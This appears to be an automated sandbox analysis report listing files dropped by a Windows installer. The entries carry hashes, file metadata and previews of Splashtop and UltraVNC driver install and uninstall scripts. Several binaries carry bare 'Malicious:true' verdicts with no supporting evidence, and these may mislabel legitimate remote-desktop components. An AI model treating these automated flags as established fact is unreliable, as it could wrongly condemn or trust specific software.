                                                                                                                                                                                                                                                                                                                                  SHA1:7059D4EFBE980F3A355CF8401A33F7EA1E129CD9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BFFA6606A5CCD1F79EF7D0F591BD6EE8FDE28C266EA8C8608D423321174CB87C
                                                                                                                                                                                                                                                                                                                                  SHA-512:FA1ED8E1A312497A1DCFB73F12D545BA298063250FCDC9E03B4EC71DD86C91743104EB322351F4AD1E33CDD3E412E92595EBA03EE860D013B0A2646BCB467327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:6FMLVJ:uMLVJ
                                                                                                                                                                                                                                                                                                                                  MD5:903B157DCA56861C845179D4D1C5E930
                                                                                                                                                                                                                                                                                                                                  SHA1:E6B5ED1511F1F14F0436CA474FF457CB340E7C60
                                                                                                                                                                                                                                                                                                                                  SHA-256:8402E0C9189FA6EF6EF8E955606C5A20F880F1106EA5F81304E42A0864F078F8
                                                                                                                                                                                                                                                                                                                                  SHA-512:53F5BE22FD9B12FF9D084A65BE63BFA7A9B5489A5D95263343EE0DB3CE749B1B6D0999AC3CC34B23A4A970F3F02DD7ED1199269C12C8B59313FF58B225774006
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:0oSneisewrWYSaizLwupc5KEQbEE+H+s+joMyyeDbE7upgO8+jaUZN:2sQ1Rpc5DQo9+s+1yy7ipgl+NL
                                                                                                                                                                                                                                                                                                                                  MD5:624A16979822CA9E244602EF815E4FCF
                                                                                                                                                                                                                                                                                                                                  SHA1:FF39FD4A7EE12C5190144E2F28AB5D7DB2A3F435
                                                                                                                                                                                                                                                                                                                                  SHA-256:18D357C3792C89E9A8FC127E65A81BE919BEC7166E537ECA080478E0370E61C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:491EB3288F3753FB18DF1E1F634C07ECA7FF6970C6CE6778E0EB0C4FB1EC0A8E490C1273A0183CAC221DB8750B03FCDE5B7B03FBF8A98A5C43048523C7CE37C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):90688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.200844475591763
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:D/QY76jVjfCCHOLvctoA3eDDjEcUVzDOhtMRFS3CZiR3IeSkuH5ysQyMK:D/QNjfCEoAOD0cUVWhmRLARnSDH5y1y3
                                                                                                                                                                                                                                                                                                                                  MD5:137E02F6D5D1BEB5F8096AA34C93545C
                                                                                                                                                                                                                                                                                                                                  SHA1:8550A23A017B440A7D558F4DBC959C643262D803
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CE571A987AEE98698D1A70D39A744A416136370D5659B23DE8C1CC523CEEB83
                                                                                                                                                                                                                                                                                                                                  SHA-512:38DD0F680C3D906307B0BDD835E035D154F0F65DCB69D25455D81F50F6E1ECC3854A507A26B2C1FE029B05EC1BC7ABB974DDB2190BC06B5808C4A14E243E808D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):411
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977180725182127
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdGk3hd0E23B1047V1j47V1u471kgAq3Gn3C:/1RqXRC4R94RQ4dAqqy
                                                                                                                                                                                                                                                                                                                                  MD5:2203EE251159885EF20D6970F67529C3
                                                                                                                                                                                                                                                                                                                                  SHA1:D775009C08D7EC7F684FC7B657DDC7BCB7DA94C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3D0070A0EA5BB0708565930199C77E7DC4BFC31A6B368B2F8A7B0239E739304
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A1BBF3F460DCDCDE1DE3D5F345973D1827EB717AB7FCA3C3DE5A12E324125EF94D7FFC34F664D5C1763790E3A4189F065DFCA4E0E7FB43E4BEC0DA32255E785
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon64.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon64.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd64.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8367
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.272037405136225
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.695099027186018
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2239
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.36119317959271
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; mv2.inf..;..; Installation inf for the Mirror graphics adapter...;..;....[Version]..Signature="$CHICAGO$"..Provider=%Cyberfox%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=05/25/2004,1.1..CatalogFile="mv2.cat"....[DestinationDirs]..DefaultDestDir = 11..mv2.Miniport = 12 ; drivers..mv2.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%Cyberfox% = stdMfg....[stdMfg]..%Winmv2% = mv2, mv_hook_display_driver2....;..; General installation section..;....[mv2]..CopyFiles=mv2.Miniport, mv2.Display....;..; File sections..;....[mv2.Miniport]..mv2.sys....[mv2.Display]..mv2.dll......;..; Service Installation..;....[mv2.Services]..AddService = mv2, 0x00000002, mv2_Service_Inst, mv2_EventLog_Inst....[mv2_Service_Inst]....ServiceType = 1 ; SERVICE_KERNEL_DRIVER..StartType = 1 ; SERVICE_SYSTEM_START..ErrorControl = 0 ; SERVICE_ERROR_IGNORE..LoadOrderGroup = Video..ServiceBinary
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10304
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.601225217483284
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:setupdrv install
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (396), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.872615036376876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1. GRANT OF LICENSE:......RDV-Soft hereby grants Ultr@VNC Team -non-exclusive, royalty-free, worldwide, perpetual license to distribute, use the software product "Mirror driver" in binary form for their remote controle software. Ultr@VNC Team hereby grants the end-user the right to use and distribute the software product "Mirror Driver" with "Ultr@VNC"..... ....2. LIMITED WARRANTY......NO WARRANTY. To the maximum extent permitted by applicable law, We expressly disclaims any warranty for the SOFTWARE PRODUCT "Mirror Driver". The SOFTWARE PRODUCT "Mirror Driver" and any related documentation are provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability or fitness for a particular purpose...NO LIABILITY FOR CONSEQUENTIAL DAMAGES. To the maximum extent permitted by applicable law, in no event shall we be liable for any damages whatsoever (including, without limitation, damages for loss of business pro
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.9219061141523825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:1zCCrWvSRU7VEBmGDnw29Gz07X83JlcytyCpw:1zCCrM7Uio83JljtyIw
                                                                                                                                                                                                                                                                                                                                  MD5:50F6A9509729A6D8D97E29AD259C6A1E
                                                                                                                                                                                                                                                                                                                                  SHA1:1AEADFC64CD4D6B9D878F93999A4D571936CCA91
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8B3049C278B7E3FE2CFE4D84096A292CC14557EBCC02B8998EB14C83289EB8F
                                                                                                                                                                                                                                                                                                                                  SHA-512:71660BEE4D58074B05538DA18F905CBFAF1567C60AA02F7C979571F3D21AC2AD56F19B3B7FEB2430686302222932CB901B0B895C16076EF1963CC93C94311769
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p..p..p......p......p.n....p..p."p......p......p......p.Rich.p.................PE..L.....H.....................`.......<............@..........................p......z_..........................................x....`..4...............................................................@............................................text............................... ..`.rdata...0.......@..................@..@.data...d3... ....... ..............@....rsrc...4....`.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.932556842608647
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdgk3hdyE23B1047V1j47V1u47jkgAq3Gn3C:/jR8XRC4R94RQ43Aqqy
                                                                                                                                                                                                                                                                                                                                  MD5:00A98380A84308DFEDB409827DB9C916
                                                                                                                                                                                                                                                                                                                                  SHA1:F31EC578108616125450187C709B6E133425BC25
                                                                                                                                                                                                                                                                                                                                  SHA-256:948C84A52F8847798150629B396E29857C0C7EB77550276A000E02B2B9C85A4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:73AFAEB0394B470102A05D6E7F1195E60BEFE5469241C5ED182032AC80E54196945E7E9AA9AC2391DC13528E06F3D6C165C4083ECFE6B6F07A1E8F2E30AA5A8E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28904
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117643529522381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:e+YCxM04ZZNXkvT4cTMUBZ17XM/Q3HUL+drIKumXOs:eULtXFULWfZ
                                                                                                                                                                                                                                                                                                                                  MD5:87FC012C1B45E780B6CFF6C4F1677C3B
                                                                                                                                                                                                                                                                                                                                  SHA1:C8EDB2EA85AE5EC17232F6E4CC5594AFB4805936
                                                                                                                                                                                                                                                                                                                                  SHA-256:D09E57690C0E9D6FF7EF26C7DD85F2E6D19C8E7B36CC298AEBAE04B16D59CA45
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CD0590444B5FC79CDCD98196D43B027FA17091B49C5246CF9AE97128131BE851D7547BFB5896A2400045CE38901D74A61AEE2DE7D833B178CBDC6EFCC30CBAA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sk..7...7...7...>rn.0...7.......>rz.4...>r|.4...>rj.3...>r`.6...>r}.6...>rx.6...Rich7...........................PE..d...@.@R.........."......8......................................................................................................................(.......8....P..X....T..........(....1...............................................0...............................text...F........................... ..hNONPAGED..... ...................... ..h.rdata.......0......................@..H.data........@....... ..............@....pdata..X....P.......$..............@..HPAGE....G....`.......(.............. ..`INIT.................D.............. ....rsrc...8............L..............@..B.reloc..t............R..............@..B........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2470977727549695
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dYV0K8G6Pm/mec99KfRFQi64hA3C:kid40K8GteerfUibA3C
                                                                                                                                                                                                                                                                                                                                  MD5:1E14B5A16092F96F382E7CC1291A2B8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5CBD16AE4C6570AF42D6DC61C64AC2660FD88F60
                                                                                                                                                                                                                                                                                                                                  SHA-256:D547136F9EDF4066EF4E59864EED1D45EEBAE7FBB338F0068C925B6E6212A0CE
                                                                                                                                                                                                                                                                                                                                  SHA-512:1B5222F0F87C6C4A651868DFF84A7BB69A3C913257F0665DD955AF411AD9FC7D19AA1242F362BA676474CCEDDAC51D2B3A1AAEBA11BAEFEF899C6D5C0F083509
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe update stdpms.inf *PNP09FF >> inst.log..reg add "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /f /v "BlankScreenType" /t REG_DWORD /d 2 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):207
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.345831283284553
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dRLw0K8G6Pm/MWyec99KfRFQi64hA3C:kidm0K8GtfyerfUibA3C
                                                                                                                                                                                                                                                                                                                                  MD5:0270238B2339619D2CC54585124D1ED3
                                                                                                                                                                                                                                                                                                                                  SHA1:657F624CD74BADB8CB0186731FEDA17A997AD929
                                                                                                                                                                                                                                                                                                                                  SHA-256:01D2B51A0E18924936C30611457CAD5C5CC2A803C4CFD45E0850A92F6C55B6D7
                                                                                                                                                                                                                                                                                                                                  SHA-512:52A05F90023926CE9274C64CDE925C2C6055439201AF932459D4FED3D823D08164C76695FFEBA1763C4F9D76D52AAB2F86E230603E3DC2FB7664256E1856CFF8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe update stdpms.inf *PNP09FF >> inst.log..reg add "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /f /v "BlankScreenType" /t REG_DWORD /d 2 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8925
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.166871854157093
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:dBsB42FHECwUnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lfr9mlv4:kB4UwUnYPL/p1P6j7Tmu
                                                                                                                                                                                                                                                                                                                                  MD5:38BEB031E625E814CFA8F84CEEE2B8FF
                                                                                                                                                                                                                                                                                                                                  SHA1:103C875EE0378BA5375A34E731FB2AFFC07939E1
                                                                                                                                                                                                                                                                                                                                  SHA-256:D441726A3E82AF0DF1C60EDD17B753E59827789BC50E3E79FE957319085F9091
                                                                                                                                                                                                                                                                                                                                  SHA-512:45DAD2545DB7B3A43DA22FB04518320BFE7E601AF053866253A52F887EE7C8919587AB11C448D335758BEFE2633D3D176B022F2E29D2B920F6164A6101F7CC41
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1897
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.40875279355006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:jshokavrehezNkgyfROQ9gHwuMgHPgHh2v6YgFR:jMokCcakgMgyIMsAegn
                                                                                                                                                                                                                                                                                                                                  MD5:A68830A694AB983F0CBF2CC735A535E8
                                                                                                                                                                                                                                                                                                                                  SHA1:7C8238EF32BA39CD9C94DD05450A7DE0EDE145D4
                                                                                                                                                                                                                                                                                                                                  SHA-256:6F5CA12FFDFF830B32F02AF03C7B385819CC07BB51AC72A20D69B9C51B2E4112
                                                                                                                                                                                                                                                                                                                                  SHA-512:581478C5A9488227D0C56E34B7AE353C3FA7068D84023AEC14390B31D24B65BED82FD39590C5A7C4875AD25DEF17FC67ACC97C327D4282AD1E11DD9C260A714C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$WINDOWS NT$"..Class=Monitor..ClassGUID={4d36e96e-e325-11ce-bfc1-08002be10318}..Provider=%splashtop%..DriverVer=06/19/2013,1.0.0.1..CatalogFile=stdpms.cat....[SourceDisksFiles]..stdpms.sys = 99....[SourceDisksNames]..99 = %DISK_NAME%,,,""....[SourceDisksNames.AMD64]..99 = %DISK_NAME%,,,64bits....[DestinationDirs]..DefaultDestDir = 10..CopyFunctionDriver = 12....[Manufacturer]..%splashtop% = Vendor, NTx86, NTAMD64....[Vendor.NTx86]..%splashtop.DeviceDesc%=stdpms.Inst, *PNP09FF....[Vendor.NTAMD64]..%splashtop.DeviceDesc%=stdpms.Inst, *PNP09FF....[stdpms.Inst]..CopyFiles=CopyFunctionDriver..AddReg=stdpms.AddReg....[stdpms.AddReg]..HKR,,DevLoader,,*ntkern..HKR,,NTMPDriver,,stdpms.sys..HKR,,Description,,%splashtop.DeviceDesc%....[stdpms.Inst.NT]..CopyFiles=CopyFunctionDriver....[stdpms.Inst.NT.Services]..Addservice = stdpms, 0x00000002, stdpms_Service_Inst....[CopyFunctionDriver]..stdpms.sys,,,2....[stdpms_Service_Inst]..DisplayName = %splashtop.SvcDesc%..ServiceTyp
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.296320987470735
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:G7yGlvIydpSkgTyLAykFsAZNOhFB8LHFnYPL/p1P6j7rflo:KyGlvIydQkgTgQFJjrFumXflo
                                                                                                                                                                                                                                                                                                                                  MD5:F44EC7AB90115F60EE5C89C40326E637
                                                                                                                                                                                                                                                                                                                                  SHA1:01BEC4EA8173F191321300587142A6E750728854
                                                                                                                                                                                                                                                                                                                                  SHA-256:C870FAFAD5C6DB27954C0440D9EFDDCE7B9C61D754EF0E77ABF18EFA1055DD90
                                                                                                                                                                                                                                                                                                                                  SHA-512:17FD122441EB1B2DBEAD9D79E0B8DB2CB0D581B930DF140069BD77440AA4F9BF4DB80784F261F57253CF3351546817238AAC81B2D68DA74884C46D514C9A9EDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.13651514908582
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kWgfeVKfDFGjdCi4eGjdyE23B1047V1j47V1u477lLWNi:ZoDowvei8XRC4R94RQ4h9
                                                                                                                                                                                                                                                                                                                                  MD5:F42F2B0F25E41755569A7775A5C6F8BA
                                                                                                                                                                                                                                                                                                                                  SHA1:B630C60A3375309731B0B7AC33A9D6E12B44ED50
                                                                                                                                                                                                                                                                                                                                  SHA-256:F026A21D6037169A81AC862A79E4F47C674B34914C1DED36BCDDB8739C838F46
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D9B9335D4767ACFCF651DB62B2B710CC9ECB402980D6A98982A1EA1C0A6F64FBA9762F2A44673CFE5749EE742F5FE68031FCFF968B4B4D2A290E74A0192375B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..reg delete "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /v "BlankScreenType" /f >> inst.log..utils\devcon.exe /r remove *PNP09FF >> inst.log..utils\devcon.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End..utils\DIFxCmd.exe /u stdpms.inf >> inst.log..:End
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):447
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.223602249135668
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kWgMyeVKfDFGjdd4eGjd0E23B1047V1j47V1u477DLWNi:Z3EDoQeiqXRC4R94RQ4P9
                                                                                                                                                                                                                                                                                                                                  MD5:3ADA65DC27A4580E1CF3FDC58A4A8C79
                                                                                                                                                                                                                                                                                                                                  SHA1:C1D8A0723FE1C586CEA434297CEF96E4E25C847D
                                                                                                                                                                                                                                                                                                                                  SHA-256:21D46DA2DC3808664C0D6028271BE0EEAB25DEFE60653E481238EEE96273E609
                                                                                                                                                                                                                                                                                                                                  SHA-512:B55E5E2CD2C1E48C526DEA70C075810F019942A72C2B0BBEF31E2DC8337B104ED5EB199AD6F0D8A16C6DFF3353193E647011A3E80762E47C9E7C13C6FCD4DBB4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..reg delete "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /v "BlankScreenType" /f >> inst.log..utils\devcon64.exe /r remove *PNP09FF >> inst.log..utils\devcon64.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End..utils\DIFxCmd64.exe /u stdpms.inf >> inst.log..:End
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
